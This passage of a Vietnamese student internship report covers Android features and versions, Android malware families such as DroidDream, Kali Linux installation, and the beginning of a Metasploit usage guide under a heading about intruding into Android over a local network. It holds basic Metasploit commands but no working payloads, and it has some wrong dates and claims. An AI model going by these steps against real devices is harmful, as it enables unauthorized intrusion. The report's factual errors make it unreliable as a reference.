cho rằng Google đang phát triển một thiết bị cầm tay mang thương hiệu Google. Và lại càng có

nhiều suy đoán sau bài viết về việc Google đang định nghĩa các đặc tả công nghệ và trình diễn các

mẫu thử với các nhà sản xuất điện thoại di động và nhà mạng.

1.3.Đặt điểm của Android

1.3.1. Tính mở

Android được xây dựng từ dưới đi lên cho phép người phát triển tạo các ứng dụng di động hấp dẫn

với đầy đủ các điểm mạnh của các thiết bị cầm tay hiện có. Android hoàn toàn mở, một ứng dụng

có thể gọi tới bất kể một chức năng lõi của điện thoại như tạo cuộc gọi, gửi tin nhắn hay sử dụng

máy ảnh, cho phép người phát triển tạo phong phú hơn, liên kết hơn các tính năng cho người dùng.

Android được xây dựng trên nhân Linux mở. Thêm nữa, nó sử dụng một máy ảo mà đã được tối ưu

hóa bộ nhớ và phần cứng với môi trường di động. Android mà một mã nguồn mở, nó có thể được

mở rộng để kết hợp tự do giữa các công nghệ nổi trội. Nền tảng này sẽ tiếp tục phát triển bởi cộng

đồng phát triển để tạo ra các ứng dụng di động hoàn hảo.

1.3.2. Tính ngang bằng của các ứng dụng.

Với Android, không có sự khác nhau giữa các ứng dụng điện thoại cơ bản với ứng dụng của bên

thứ ba. Chúng được xây dựng để truy cập như nhau tới một loạt các ứng dụng và dịch vụ của điện

thoại. Với các thiết bị được xây dựng trên nền tảng Android, người dùng có thể đáp ứng đầy đủ các

nhu cầu mà họ thích. Chúng ta có thể đổi màn hình nền, kiểu gọi điện thoại, hay bất kể ứng

dụng nào. Chúng ta thậm chí có thể hướng dẫn điện thoại chỉ xem những ảnh mình thích.

1.3.3. Phá vỡ rào cản phát triển ứng dụng.

Android phá vỡ rào cản để tạo ứng dụng mới và cải tiến. Một người phát triển có thể kết hợp thông

tin từ trang web với dữ liệu trên điện thoại cá nhân – chẳng hạn như danh bạ, lịch hay vị trí trên

bản đồ – để cung cấp chính xác hơn cho người khác. Với Android, người phát triển có thể xây

dựng một ứng dụng mà cho phép người dùng xem vị trí của những người bạn và thông báo khi họ

đang ở vị trí lân cận. Tất cả được lập trình dễ dàng thông qua sự hỗ trợ của MapView và dịch vụ

định vị toàn cầu GPS.

1.3.4. Xây dựng ứng dụng dễ dàng và nhanh chóng

Android cung cấp bộ thư viện giao diện lập trình ứng dụng đồ sộ và các công cụ để viết các ứng

dụng phức tạp. Ví dụ, Android có thể cho phép người phát triển biết được vị trí của thiết bị và cho

phép các thiết bị giao tiếp với nhau để có thể tạo nên mạng xã hội chia sẻ ngang hàng rộng khắp.

Thêm nữa, Android còn bao gồm một bộ công cụ đầy đủ giúp cho việc phát triển trở nên dễ dàng.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 20

1.4.Các phiên bản của android

Lịch sử phiên bản của hệ điều hành di động Android bắt đầu với bản Android beta vào tháng 11

năm 2007. Phiên bản thương mại đầu tiên, Android 1.0, được phát hành vào tháng 9 năm 2008.

Android đang được phát triển bởi Google và Open Handset Alliance (OHA), và đã có một số bản

cập nhật cho hệ điều hành này kể từ khi ra mắt.

Từ tháng 4 2009, phiên bản Android được phát triển dưới tên mã là chủ đề bánh kẹo và phát hành

theo thứ tự bảng chữ cái: Cupcake (1.5), Donut (1.6), Eclair (2.0–2.1), Froyo (2.2–2.2.3),

Gingerbread (2.3–2.3.7), Honeycomb (3.0–3.2.6), Ice Cream Sandwich (4.0–4.0.4), Jelly Bean

(4.1–4.3), và KitKat (4.4). Vào 3 tháng 9 năm 2013, Google công bố rằng 1 tỉ thiết bị đã được kích

hoạt hiện sử dụng Android OS trên toàn cầu. Bản cập nhật Android gần đây nhất là KitKat 4.4, nó

được phát hành bản thương mại trên thiết bị 22 tháng 11 2013, thông qua cập nhật OTA.

Phiên bản API Tên Ngày phát hành

1.0 Cấp 1 23/9/ 2008

1.1 Cấp 2 9/2/2009

1.5 Cấp 3 Cupcake 30/4/2009

1.6 Cấp 4 Donut 15/9/2009

2.0 Cấp 5

Eclair

26/10/2009

2.0.1 Cấp 6 3/12/2009

2.1 Cấp 7 12/1/2010

2.2

Cấp 8 Froyo

20/5/2010

2.2.1 18/1/2011

2.2.2 22/1/2011

2.2.3 21/11/2011

2.3

Cấp 9 Gingerbread

6/12/2010

2.3.1 12/2010

2.3.2 1/2011

2.3.3

Cấp 10 Gingerbread

9/2/2011

2.3.4 28/4/2011

2.3.5 25/7/2011

2.3.6 2/9/2011

2.3.7 21/9/2011

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 21

3.0 Cấp 11

Honeycomb

22/2/2011

3.1 Cấp 12 10/5/2011

3.2

Cấp 13

15/7/2011

3.2.1 20/9/2011

3.2.2 30/8/2011

3.2.3

3.2.4 12/2011

3.2.5 1/2012

3.2.6 2/1012

4.0

Cấp 14

Ice Cream

Sandwich

19/10/2011

4.0.1 21/10/2011

4.0.2 28/11/2011

4.0.3 Cấp 15

16/12/2011

4.0.4 29/3/2012

4.1

Cấp 16 Jelly Bean

9/7/2012

4.1.1 23/7/2012

4.1.2 9/10/2012

4.2

Cấp 17

13/11/2012

4.2.1 27/11/2012

4.2.2 11/2/2013

4.3 Cấp 18

24/7/1013

4.3.1 3/10/2013

4.4

Cấp 19 KitKat

31/10/2013

4.4.1 5/12/2013

4.4.2 9/12/2013

4.4.3 2/6/2014

4.4.4 19/6/2014

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 22

1.5.Tỷ lệ sử dụng các phiên bản android

Phần lớn các thiết bị Android cho tới nay vẫn chạy hệ điều hành phiên bản 4.1.x Jelly Bean được

phát hành ngày 9 tháng 7 năm 2012 nhờ tính ổn định và hỗ trợ tốt các máy có cấu hình thấp cùng

với các phiên bản 4.x khác. Bên cạnh đó các thiết bị Android vẫn còn sử dụng các phiên bản cũ hơn

là 2.3 Gingerbread phát hành ngày 6 tháng 12 năm 2010.

Tỷ lệ sử dụng các phiên bản khác nhau tính đến ngày 20 tháng 7 năm 2014

1.6.So sánh android 2.3 (Gingerbread) và android 4.x (4.0 – Ice Cream Sandwich):

Android 2.3, tên mã là Gingerbread được phát hành vào ngày 6 tháng 12 năm 2010 và là một bản nâng

cấp của Android v2.2 Froyo. Các phiên bản 2.3 được thiết kế đặc biệt cho điện thoại thông minh, nó

được coi là một trong những phiên bản phổ biến nhất của Android cho điện thoại thông minh. Ngoài bố

trí đã có sẵn trên Froyo, công ty cung cấp các thay đổi như giao diện người dùng được cập nhật, tăng

tốc độ và sự đơn giản, hỗ trợ cho màn hình lớn hơn và độ phân giải cao, hỗ trợ cho hệ thống điện thoại

SIP VOIP, bàn phím ảo nhanh hơn và trực quan hơn, chức năng sao chép dán nâng cao, hỗ trợ NFC,

hiệu ứng âm thanh mới, quản lý download mới, hỗ trợ nhiều camera, hỗ trợ xem video WebM/VP8 và

AAC mã hóa âm thanh, cải thiện quản lý điện năng, chuyển từ YAFFS đến ext4 trên các thiết bị mới

hơn, âm thanh, đồ họa và cải tiến đầu vào cho các nhà phát triển trò chơi, đồng thời thu gom rác thải và

hỗ trợ cho các cảm biến nhiều hơn. Công ty cũng vận chuyển một cập nhật nhỏ cho Gingerbread theo

phiên bản 2.3.3-2.3.7. Những bản cập nhật được cung cấp tính năng mới như: hỗ trợ cho giọng nói hoặc

video chat, mở cửa phụ kiện hỗ trợ thư viện, cải tiến để ứng dụng gmail, hình ảnh động bóng cho danh

sách cuộn, cải tiến phần mềm máy ảnh và cải thiện hiệu quả pin.

Android 4.0 Ice Cream Sandwich đã được công khai phát hành vào ngày 19 Tháng 10 năm 2011. Các

Android 4.0 thật sự là một sự là một bản nâng cấp của 2.3 Gingerbread và được cung cấp một loạt các

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 23

tính năng mới. Android cũng đã có phiên bản 3.0, chỉ dành cho máy tính bảng. Phiên bản này về cơ bản

là một sự kết hợp của Android 2.3.x và Android 3.x. Công ty cung cấp các tính năng cập nhật như: nút

mềm, widgets, dễ dàng để tạo thư mục mới, cải thiện thư thoại trực quan, chức năng pinch-to-zoom,

chụp ảnh màn hình, bàn phím được cải thiện, khả năng truy cập các ứng dụng từ lockscreen, tính năng

mở khóa bằng nhận diện khuôn mặt, trình duyệt web theo thẻ, tự động đồng bộ hóa trình duyệt chrome

đánh dấu, kiểu chữ mới cho giao diện người dùng, cải thiện ứng dụng máy ảnh, được xây dựng trong

biên tập ảnh, bố trí bộ sưu tập mới, ứng dụng tích hợp với mạng xã hội, cập nhật trạng thái và hình ảnh

hi-res, khả năng tương thích NFC, tăng tốc phần cứng, quản lý wifi và quay video 1080p

1.6.1. Sự khác nhau về yêu cầu phần cứng cần thiết để cài đặt

Android 2.3 Android 4.0

Cần ít nhất 128 MB bộ nhớ có sẵn cho Kernel

và cho không gian người sử dụng

Cần ít nhất 340 MB bộ nhớ có sẵn cho kernel và

cho không gian người sử dụng

Dung lượng Ram tối thiểu cần thiết là 150MB Dung lượng Ram tối thiểu cần thiết là 350 MB

Màn hình:

- Màn hình phải có kích cỡ ít nhất 2,5 inch

- Mật độ phải được ít nhất 100 dpi

- Tỉ lệ màn hình từ 1.333 (4:3) đến 1,779

(16:9)

- Công nghệ màn hình được sử dụng là

công nghệ “ Square pixels”

Màn hình:

- Màn hình phải có kích cỡ ít nhất

426x320

- Mật độ phải được ít nhất 100 dpi

- Tỉ lệ màn hình từ 1.333 (4:3) đến 1,85

(16:9)

Yêu cầu có các phím vậy lý Không yêu cầu có có phím vật lý

Các API Android bao gồm trình quản lý

download các ứng dụng có thể sử dụng để tải dữ

liệu.Trình quản lí download phải có khả năng tải

tập tin có dung lượng ít nhất 55 MB

Các API Android bao gồm trình quản lý

download các ứng dụng có thể sử dụng để tải dữ

liệu.Trình quản lí download phải có khả năng tải

tập tin có dung lượng ít nhất 100 MB

1.6.2. Sự khác nhau về giao diện

Giao diện người dùng của Android dựa trên nguyên tắc tác động trực tiếp, sử dụng cảm ứng

chạm tương tự như những động tác ngoài đời thực như vuốt, chạm, kéo dãn và thu lại để xử lý các

đối tượng trên màn hình. Sự phản ứng với tác động của người dùng diễn ra gần như ngay lập tức,

nhằm tạo ra giao diện cảm ứng mượt mà, thường dùng tính năng rung của thiết bị để tạo phản hồi

rung cho người dùng. Những thiết bị phần cứng bên trong như gia tốc kế, con quay hồi chuyển và

cảm biến khoảng cách được một số ứng dụng sử dụng để phản hồi một số hành động khác của người

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 24

dùng, ví dụ như điều chỉnh màn hình từ chế độ hiển thị dọc sang chế độ hiển thị ngang tùy theo vị

trí của thiết bị, hoặc cho phép người dùng lái xe đua bằng xoay thiết bị, giống như đang điều khiển

vô-lăng.

Các thiết bị Android sau khi khởi động sẽ hiển thị màn hình chính, điểm khởi đầu với các

thông tin chính trên thiết bị, tương tự như khái niệm desktop (bàn làm việc) trên máy tính để bàn.

Màn hính chính Android thường gồm nhiều biểu tượng (icon) và tiện ích (widget); biểu tượng ứng

dụng sẽ mở ứng dụng tương ứng, còn tiện ích hiển thị những nội dung sống động, cập nhật tự động

như dự báo thời tiết, hộp thư của người dùng, hoặc những mẩu tin thời sự ngay trên màn hình chính.

Màn hình chính có thể gồm nhiều trang xem được bằng cách vuốt ra trước hoặc sau, mặc dù giao

diện màn hình chính của Android có thể tùy chỉnh ở mức cao, cho phép người dùng tự do sắp đặt

hình dáng cũng như hành vi của thiết bị theo sở thích. Những ứng dụng do các hãng thứ ba có trên

Google Play và các kho ứng dụng khác còn cho phép người dùng thay đổi "chủ đề" của màn hình

chính, thậm chí bắt chước hình dáng của hệ điều hành khác như Windows Phone chẳng hạn. Phần

lớn những nhà sản xuất, và một số nhà mạng, thực hiện thay đổi hình dáng và hành vi của các thiết

bị Android của họ để phân biệt với các hãng cạnh tranh.

Ở phía trên cùng màn hình là thanh trạng thái, hiển thị thông tin về thiết bị và tình trạng kết

nối. Thanh trạng thái này có thể "kéo" xuống để xem màn hình thông báo gồm thông tin quan trọng

hoặc cập nhật của các ứng dụng, như email hay tin nhắn SMS mới nhận, mà không làm gián đoạn

hoặc khiến người dùng cảm thấy bất tiện. Trong các phiên bản đời đầu, người dùng có thể nhấn vào

thông báo để mở ra ứng dụng tương ứng, về sau này các thông tin cập nhật được bổ sung theo tính

năng, như có khả năng lập tức gọi ngược lại khi có cuộc gọi nhỡ mà không cần phải mở ứng dụng

gọi điện ra. Thông báo sẽ luôn nằm đó cho đến khi người dùng đã đọc hoặc xóa nó đi.

Android 2.3 Android 4.0

Giao diện đơn giản Giao diện tinh tế hơn, trong suốt và đẹp mắt hơn

Chỉ hỗ trợ phím ảo là phím Home Hỗ trợ các phím ảo: Home, Back, Menu

Không có widget menu Có Widget menu giúp tìm nhanh thông tin mà

không cần mở ứng dụng

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 25

1.6.3. Sự khác nhau về tính năng

Android 2.3 Android 4.0

Thiết kế tối ưu hóa cho Smartphone Thiết kế tối ưu hóa cho Smartphone và Tablet

Chỉ có thể xóa tất các các thông báo cùng lúc trên

trình quản lý

Chỉ có thể xóa riêng rẽ các thông báo cùng lúc

trên trình quản lý

Chỉ có thể trả lời, ngắt cuộc gọi khi màn hình bị

khóa

Có thể thực hiện thêm 1 số tính năng khi màn

hình bị khoái ngoài trả lời , ngắt cuộc gọi như gửi

tin nhắn

Không có tính năng mở khóa màn hình nhận diện

khuôn mặt

Có tính năng mở khóa màn hình nhận diện khuôn

mặt

Không hỗ trợ chỉnh sửa hình ảnh Hỗ trợ chỉnh sửa hình ảnh , tự động nhận diện

được tất cả các camera trên thiết bị

1.6.4. Sự khác nhau về giao thức mạng

Android 2.3 Android 4.0

Không hỗ trợ giao thức https Hỗ trợ giao thức https

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 26

2. Nghiên cứu về mã độc trong mỗi trường android 2.1.Malware là gì?

Malware (phần mềm độc hại) viết tắt của cụm từ Malicious Sofware, là một phần mềm máy tính

được thiết kế với mục đích thâm nhập hoặc gây hỏng hóc và thay đổi các thực thi của hệ điều hành

cũng như các chương trình ứng dụng mà không có sự cho phép của người dùng và bằng một cách

nào đó mà người dùng nếu không để ý cũng không thể phát hiện được những thay đổi đó.

Hình 1.

Phần mềm độc hại đã xuất hiện từ rất lâu trên những hệ điều hành máy tính như Windows, các máy

tính MAC và Linux (ở một mức độ thấp hơn), và bây giờ nó đã trở thành một mối nguy hại không

nhỏ cho các thiết bị di động chạy Android. Sự có mặt của Android khiến cho các phần mềm độc

hại thêm phần thích thú, tích cực tấn công hơn tới đông đảo người dùng Android. Nói về vấn đề

này, Timothy Armstrong, một chuyên gia bảo mật tại Kaspersky Lab, cho biết: “Malware trên

Android được phát hiện nhiều hơn hầu như mỗi ngày. Thời gian gần đây, chúng tôi đã phát hiện ra

ba nhà phát triển ứng dụng (mà có khi là từ cùng 1 người) với tên gọi MYOURNET, Kingmall2010,

we20092020 đã cung cấp các ứng dụng để tải về miễn phí trên Android Market, mà hầu hết các

ứng dụng đó đều chứa mã độc”.

Hình 2.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 27

Năm 2012 là năm thứ hai cho thấy sự bùng nổ của phần mềm độc hại cho Android. Từ tám chương

trình độc hại duy nhất vào tháng 1 năm 2011, tỷ lệ phát hiện trung bình hàng tháng phần mềm độc

hại mới tấn công vào Android trong năm 2011 đã lên đến hơn 800 mẫu. Trong năm 2012, Kaspersky

Lab đã xác định trung bình 6.300 mẫu phần mềm độc hại trên thiết bị di động mới mỗi tháng. Nhìn

chung, trong năm 2012 số lượng mẫu độc hại cho Android được biết đến nhiều tăng hơn tám lần.

2.2.Phân loại

Đa số các phần mềm độc hại Android có thể được chia thành ba nhóm chính dựa theo chức năng:

- SMS Trojans: bòn rút tài khoản di động của các nạn nhân bằng cách gửi tin nhắn SMS đến

các số điện thoại được đánh giá cao.

- Backdoors: cung cấp truy cập trái phép vào smartphone, cài đặt các chương trình độc hại

khác hoặc ăn cắp dữ liệu cá nhân của người dùng.

- Cuối cùng là các phần mềm gián điệp nhằm mục tiêu thu thập trái phép dữ liệu cá nhân,

chẳng hạn như sổ địa chỉ và mật khẩu (hoặc thậm chí hình ảnh cá nhân).

Trong nửa đầu năm 2012, Backdoors, tin nhắn SMS, Trojans và phần mềm gián điệp chiếm 51%

các phần mềm độc hại cho Android mới được phát hiện. Trong bảng xếp hạng Top Ten phần mềm

độc hại cho Android đã bị chặn bởi Kaspersky Mobile Security hoặc Kaspersky Tablet Security,

SMS Trojans là phổ biến nhất và các ứng dụng hiển thị quảng cáo không mong muốn cho người sử

dụng ở vị trí thứ hai. Ít phổ biến rộng rãi nhưng nguy hiểm nhất là Trojans ngân hàng trên di động

thường xuyên làm việc kết hợp với các máy tính để bàn, ví dụ như Carberp.

Nền tảng Android cho phép cài đặt phần mềm từ các nguồn không tin cậy, và là một trong những

cách tốt nhất để đảm bảo sự lây nhiễm từ việc cài đặt các chương trình từ những trang web đáng

ngờ. Tuy nhiên, phần mềm độc hại trên nền tảng phân phối ứng dụng chính thức Google Play là

một xu hướng bắt đầu vào năm 2011 và tiếp tục trong năm 2012, bất chấp những nỗ lực tốt nhất

của Google để làm giảm hoạt động tội phạm mạng. Một trong những ví dụ “khác thường” nhất của

phần mềm độc hại trên di động trong năm 2012 là "Find and Call", ứng dụng đã len lỏi được vào

Google Play cũng như kho ứng dụng của Apple.

2.3.Cơ chế hoạt động của Malware

Lấy một ví dụ cụ thể về 1 Malware rất phổ biến trong thời gian vừa qua đó là Malware DroidDream.

Malware này hoạt động qua 2 giai đoạn:

Giai đoạn đầu: DroidDream được nhúng vào trong một ứng dụng (số lượng ứng

dụng chứa Malware này hiện đã nhiều hơn 50 ứng dụng) và sẽ chiếm được quyền root vào thiết bị

của bạn ngay sau khi bạn chạy ứng dụng đó trong lần sử dụng đầu tiên.

Giai đoạn 2: Tự động cài đặt một ứng dụng thứ 2 với một giấy phép đặc biệt cho phép

quyền uninstall. Một khi các ứng dụng thứ 2 được cài đặt, nó có thể gửi các thông tin

nhạy cảm tới một máy chủ từ xa và âm thầm tải thêm các ứng dụng khác. Một khi DroidDream

chiếm được quyền root, Malware này sẽ chờ đợi và âm thầm cài đặt một ứng dụng thứ hai,

DownloadProviderManager.apk như một ứng dụng hệ thống. Việc cài đặt ứng dụng hệ thống này

nhằm ngăn ngừa người dùng xem hoặc gỡ bỏ cài đặt các ứng dụng mà không được phép. Nghiên

cứu cài đặt HĐH Android trên các thiết bị laptop, smartphone.Không giống như giai đoạn đầu,

người dùng phải khởi động ứng dụng để bắt đầu việc lây nhiễm, ở giai đoạn thứ 2 ứng dụng tự

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 28

động làm một số việc như là confirm, checkin….Một điều nữa khiến cho bạn không thể biết chúng

hoạt động lúc nào, đó là Malware DroidDream này được lập trình để làm hầu hết các công việc

của mình vào khoảng thời gian từ 11h đêm tới 8h sáng ngày hôm sau. Đây là khoảng thời gian mà

điện thoại ít có khả năng được sử dụng nhất. Điều này làm cho người dùng khó khăn hơn trong

việc phát hiện một hành vi bất thường trên chiếc smartphone của mình.

2.4.Mục đích của Malware DroidDream

DroidDream được coi là một trong những Malware đầu tiên trên Android, mục đích của con

DroidDream này mới chỉ dừng lại ở mức độ làm cho chiếc điện thoại của người dùng tự động cài

đặt những ứng dụng chứa mã độc khác. Tuy nhiên các biến thể của nó đã kịp thời biến đổi để gây

ra các mối nguy hại lớn hơn rất nhiều. Ví dụ như Hippo SMS có khả năng tự gửi tin nhắn mà

không cần sự cho phép của người dùng, việc này sẽ khiến tiền cước phí của người dùng tăng lên

một cách chóng mặt mà người dùng không biết rõ lí do tại sao. Hoặc một Malware khác là Zitmo,

Malware này đưa ra các ứng dụng kích hoạt mọi hành động liên quan đến dịch vụ ngân hàng, tiếp

nhận SMS gửi đến và chuyển tới máy chủ. Các đoạn code dùng 1 lần mà các ngân hàng thường gửi

tới khách hàng thông qua tin nhắn SMS để chứng thực sẽ bị thu thập bởi các malware này. Hiện

nay còn có một số Malware còn có khả năng nghe lén tất cả các cuộc điện thoại. Vấn đề này thực

sự nguy hiểm khi tất cả các vấn đề riêng tư của chúng ta đang bị một theo dõi, vì vậy những mối

nguy hiểm từ mã độc trên android đang thực sự đe dọa đến an sự an toàn của người dùng hệ điều

hành này.

2.5.Dấu hiệu bị nhiễm các phần mềm độc hại

Cũng giống như trên máy tính, khi bị nhiễm malware, thiết bị Android của bạn sẽ có một số hành

động khác thường và bạn không thể thay đổi được bất kỳ điều gì.

- Sử dụng dữ liệu không rõ ràng: có rất nhiều phần mềm độc hại tồn tại để thu thập dữ liệu

về tài khoản, số thẻ tín dụng, danh bạ, vv... Một khi có được các thông tin này, nó sẽ tự động

được chuyển tiếp về cho người đã tạo ra nó. Và trong nhiều trường hợp, việc chuyển giao

thông tin này sẽ dẫn đến sự khác lạ trong sử dụng dữ liệu.

- Hiệu suất của thiết bị kém: tùy thuộc vào thời gian sử dụng và mức độ nghiêm trọng của

việc lây nhiễm mà hiệu suất điện thoại của bạn sẽ bị giảm đi nhiều hay ít, đặc biệt là khi bạn

đã khởi động lại thiết bị mà các vấn đề không được giảm bớt.

- Thời lượng pin bị giảm: do hầu hết các phần mềm độc hại đều được thiết kế để chạy nền

trong hệ thống, nên nó sẽ làm sụt giảm đáng kể thời lượng pin trên thiết bị của bạn.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 29

3. Xâm nhập android qua mạng local 3.1.Giới thiệu về Kali Linux

Trong những năm qua BackTrack là hệ điều hành được sử dụng nhiều nhất bởi các chuyên gia

đánh giá bảo mật. BackTrack bắt đầu xuất hiện vào năm 2006 và trong 7 năm qua nó đã không

ngừng cải tiến để đạt được một vị trí nhất định trong cộng đồng bảo mật trên khắp toàn thế giới.

Vì vậy, ngày nay thật khó để tìm thấy một người nào đó quan tâm đến an toàn thông tin mà

chưa từng nghe về BackTrack.

Tháng 3 năm 2013, Offensive Security đã tiến thêm một bước mới khi công bố phiên bản tiến

hóa của hệ điều hành BackTrack, tên của nó là Kali (được xem như phiên bản BackTrack 6), Kali

là tên nữ thần của người Hindu, hàm ý sự biến đổi và khả năng hủy diệt hay có lẽ là tên một môn

võ thuật của người Philippine ...

Để qua một bên chuyện tên với tuổi, Kali Linux là một OS rất hữu ích đối với những chuyên

gia đánh giá bảo mật, một OS tập hợp và phân loại gần như tất cả các công cụ thiết yếu mà bất kỳ

một chuyên gia đánh giá bảo mật nào cũng cần sử dụng đến khi tác nghiệp.

- Ưu điểm và Nhược điểm:

Đối với những người chưa biết BackTrack, nói một cách ngắn gọn BackTrack là một bản phân

phối Linux dựa trên nền tảng hệ điều hành Ubuntu, với nhiều công cụ bảo mật được phân loại rõ

ràng để sử dụng.

3.1.1. Kali phát triển trên nền tảng hệ điều hành Debian

Điều này có nghĩa Kali có rất nhiều ưu điểm. Đầu tiên là các Repository (Kho lưu trữ phần

mềm) được đồng bộ hóa với các Repository của Debian nên có thể dễ dàng có được các bản cập

nhật vá lỗi bảo mật mới nhất và các cập nhật Repository. Duy trì cập nhật (up-to-date) đối với các

công cụ Penetration Test là một yêu cầu vô cùng quan trọng.

Một lợi thế khác là mọi công cụ trong Kali đều tuân theo chính sách quản lý gói của Debian.

Điều này có vẻ không quan trọng nhưng nó đảm bảo rõ ràng về mặt cấu trúc hệ thống tổng thể, nó

cũng giúp cho chúng ta có thể dễ dàng hơn trong việc xem xét hoặc thay đổi mã nguồn của các

công cụ.

Một ưu điểm quan trọng trong Kali là nó đã cải tiến khả năng tương thích với kiến trúc ARM.

Từ khi Kali xuất hiện, nhiều phiên bản ấn tượng đã được tạo ra.

3.1.2. Hỗ trợ mạng không dây tốt hơn

Một trong những vấn đề được các nhà phát triển Kali chú trọng nhiều nhất, chính là sự hỗ trợ cho

một số lượng lớn phần cứng bên trong các thiết bị mạng không dây hay USB Dongles. Một yêu cầu

quan trọng khi các chuyên gia bảo mật thực hiện đánh giá mạng không dây.

3.1.3. Khả năng tùy biến cao

Kali rất linh hoạt khi đề cập đến giao diện hoặc khả năng tuỳ biến hệ thống. Đối với giao diện, giờ

đây người dùng đã có thể chọn cho mình nhiều loại Desktops như GNOME, KDE hoặc XFCE tùy

theo sở thích và thói quen sử dụng.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 30

3.1.4. Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai

Đối với bất cứ ai sử dụng Kali, đây là một tính năng quan trọng khi bảo trì hệ điều hành Kali. Với

BackTrack, bất kỳ lúc nào khi phiên bản mới được công bố thì chúng ta đều phải cài lại mới hoàn

toàn (Ngoại trừ phiên bản R2 lên R3 năm ngoái).

Giờ đây với Kali, nhờ vào sự chuyển đổi sang nền tảng hệ điều hành Debian, Kali đã dễ dàng hơn

trong việc âng cấp hệ thống khi phiên bản mới xuất hiện, người dùng không phải cài lại mới hoàn

toàn nữa.

3.2.Cài đặt Kali Linux

Trước tiên ta phải vào trang http://www.kali.org/downloads/ để download file ISO phiên bản mới

nhất về

Hình 3.

Sau đó, ta bắt đầu cài cặt theo các bước bên dưới:

Hình 4. Hình 5.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 31

Hình 6. Hình 7.

Hình 8. Hình 9.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 32

Hình 10. Hình 11.

Hình 12. Hình 13.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 33

Hình 14. Hình 15.

Hình 16.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 34

Hình 17.

Hình 18.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 35

Hình 19.

Hình 20.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 36

Hình 21.

Hình 22.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 37

Hình 23.

Hình 24.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 38

Hình 25.

Hình 26.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 39

Hình 27.

Hình 28.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 40

Hình 29.

3.3.Metasploit framework trong Kali linux

3.3.1. Giới thiệu

Metasploit framework là một framework mã nguồn mở phát triển nhằm sử dụng các shellcode

(payload) để tấn công máy có lỗ hổng. Cùng với một số bộ công cụ bảo mật khác. Metasploit có cơ

sở dữ liệu chứa hàng ngàn shellcode, hàng ngàn exploit của các hệ điều hành, các chương trình hay

dịch vụ. Trong quá trình phát triển metasploit liên tục cập nhật các exploit... nên càng ngày nó càng

trở thành một bộ công cụ mạnh mẽ.

Metasploit framework là một bộ dự án sinh ra để kiểm tra độ an toàn, nhưng đối với những hacker

thì nó thực sự là một công cụ vô cùng hữu ích (dùng để kiểm tra, khai thác lỗi, exploit…)

3.3.2. Sử dụng metasploit framework

3.3.2.1.Chọn module exploit: lựa chọn chương trình, dịch vụ lỗi mà metasploit có hỗ trợ để khai

thác

Muốn chọn ta có thể dùng lệnh "show exploits" để hiện ra tất cả các exploit mà metasploit

framework có hỗ trợ.

Để dùng exploit nào đó ta dùng câu lệnh "use name_exploit" .Trong đó tham số name_exploit là

tên của exploit đc metasploit hỗ trợ.

Để biết thêm các thông tin về exploit mà ta đã chọn có thể dùng lệnh "info name_exploit".

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 41

Ví dụ: mình sử dụng một exploit sau khi đã liệt kê ra sẽ là:

use windows/manage/add_user_domain

3.3.2.2.Cấu hình module exploit đã chọn

Sau khi đã chọn một exploit với command use, việc tiếp theo là cấu hình các options mà exploit

này yêu cầu. Để rõ hơn exploit này nó yêu cầu cấu hình như thế nào, phải cấu hình những gì, ta sử

dụng lệnh "show options".

Khi sử dụng lệnh show option ta thường nhận đc một bảng gồm các cột như sau:

Name--------------Current Setting----------------Required---------------Description

Trong đó, ở cột required nếu giá trị là "yes" thì ta phải set giá trị cho tham số này, còn nếu là "no"

thì ta có thể set hoặc không. Quan trọng phải xem một số nó đã cấu hình mặc định cho rồi có thích

hợp với chúng ta hay không.

Ta dùng lệnh “set” để cấu hình những options của module đó.

Ngoài ra nó còn có thêm một số options khác, dùng "show advanced", "show evasion" để xem.

Sau khi cấu hình xong ta cần kiểm tra xem việc cấu hình đã đúng hay chưa. Để kiểm tra việc cấu

hình ta dùng lệnh "check" để xem mục tiêu có bị tấn công được hay không. Đây là một cách nhanh

để ta kiểm tra xem việt cấu hình các options bằng lệnh set có đúng hay không và mục tiêu thực sự

có lỗ hổng để khai thác được hay không. Nhưng không phải tất cả các exploit đều thực sự có thể

